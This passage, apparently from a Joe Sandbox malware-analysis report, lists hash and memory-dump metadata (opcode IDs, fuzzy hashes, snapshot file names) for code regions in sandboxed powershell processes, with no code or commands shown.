                                            • Instruction ID: b6764d3bbbfa3afa1e852c0052589667d1e7985d7c5b09b6e1319c3bd596860e
                                            • Opcode Fuzzy Hash: d8c45826e7374cbec9469c53be0f2b02813a13aa4cbcc1ad0798ebe535f8ad14
                                            • Instruction Fuzzy Hash: DFD15632A1EB8E9FEBA59BA858655F57BE0EF52314B0901FED44CC70E3DA18AD01C341
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1848539067.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 526cc0e3655bbd356ba8088f6664a386b76c859a8fb012d3b7491325dfef3030
                                            • Instruction ID: 7963bf9dd11692009cb5203fc2558549bf222990be87c409e4b5deeb9c8eafa2
                                            • Opcode Fuzzy Hash: 526cc0e3655bbd356ba8088f6664a386b76c859a8fb012d3b7491325dfef3030
                                            • Instruction Fuzzy Hash: 7F219D6690F7CD9FDB139B289C790D47FB0EF1721470A01E7C089CB0A3D92958498792
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1848539067.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f31a7066d747f4de7f8cbdefcce7c6921c20d4c7f2f7f0155e42940e4de55d4e
                                            • Instruction ID: 2a9cf716442829311858bba8182c05d16c9748b264e75e1d5eed2ee7dd4e9fc8
                                            • Opcode Fuzzy Hash: f31a7066d747f4de7f8cbdefcce7c6921c20d4c7f2f7f0155e42940e4de55d4e
                                            • Instruction Fuzzy Hash: F441087190DB889FDB189F5C9C4A6B97FE0FB59310F04416FE449D3292CA74A915CBC2
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1848539067.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 268c180421140ac31621d8d538a752520c8cde243dcff9b6c0caca383187d890
                                            • Instruction ID: eb7ea4035f4d3c6ccd3f87fdd779f72889c474952542e29e4713bd372978c180
                                            • Opcode Fuzzy Hash: 268c180421140ac31621d8d538a752520c8cde243dcff9b6c0caca383187d890
                                            • Instruction Fuzzy Hash: 5721F83190CB4C8FEB59DBAC9C4A7E97FE0EB96321F04416FD049C3162DA749456CB92
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1847913057.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b77d000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                            • Instruction ID: dd590109c8d15fabc4b384aaa75b1de6e82b6e8f4a6bae447024e285fb581988
                                            • Opcode Fuzzy Hash: 84e4da84efb7a51fce14da70d86f151c2ca1ddb5975049c754ac93f51fb58f0f
                                            • Instruction Fuzzy Hash: 18014F3160CE088FDAA4EF1DE485D5237E0FB98320710065AD45DC756AD771F892CBC1
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1848539067.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                            • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                            • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1849146869.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 65ddf82bc1de9b4cac1f7342b007d12a5ffdeb791ff7ffa414287a2e11141245
                                            • Instruction ID: 0037cf7cd0e8da730bb9c57dfdf167aedc042902d057b13c57502d39fd69f30a
                                            • Opcode Fuzzy Hash: 65ddf82bc1de9b4cac1f7342b007d12a5ffdeb791ff7ffa414287a2e11141245
                                            • Instruction Fuzzy Hash: D0F0BE32B0E5098FD769EB9CE4519E873E0EF6532071600BAE06DC72B3CA25EC40C741
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1849146869.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 218580c49e25abb8330f7eaf565f20b386a9456a9fb043c66e0183da9ae0aabb
                                            • Instruction ID: 71936907c65e5d25e9726e2641dbf7dddf597606121a57d3b6974e27c6721ca6
                                            • Opcode Fuzzy Hash: 218580c49e25abb8330f7eaf565f20b386a9456a9fb043c66e0183da9ae0aabb
                                            • Instruction Fuzzy Hash: 0CF0BE32A0E5498FD769EB9CE0619A873E0FF0532071600BAE05DCB1A3CA26AC40C740
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1849146869.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b960000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                            • Instruction ID: c307260e9cdd7784a7691b08768f083a0fcbbbef75ed33e7c580895a31fc6b9b
                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                            • Instruction Fuzzy Hash: ADE01A31B1C808DFDA78DA8CE051AE973E1EBA832171241BBD14EC7671CA22ED518B80
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1848539067.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                            • API String ID: 0-962139525
                                            • Opcode ID: 63b5047cba73ab94ebcf28c082ddf486a212eb9717c7729175fddac6c1281f11
                                            • Instruction ID: ad9997269ca045c2f6f29c292932e0e691c5b571fa522245f23bec43a457ca72
                                            • Opcode Fuzzy Hash: 63b5047cba73ab94ebcf28c082ddf486a212eb9717c7729175fddac6c1281f11
                                            • Instruction Fuzzy Hash: 2021C2B3B04525CAD30A36ACBC559D87780DF5437938603F3E029CF193F958A48B8A81
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1987049815.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ffd9b980000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 67ef61f46b73b12671b9ea19df45689782c5e4df73b6f804f6c33aa60918573e
                                            • Instruction ID: 466a85472e6eb859c1c34c54dcaa097cc54044784ff85ca973ed2dc3b303b1b9
                                            • Opcode Fuzzy Hash: 67ef61f46b73b12671b9ea19df45689782c5e4df73b6f804f6c33aa60918573e
                                            • Instruction Fuzzy Hash: 2BD15732A1EF8D1FEBA5DBA858655B57BA0EF52314F0901FED44DCB0E3DA28A901C341
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1986179095.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7ffd9b8b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: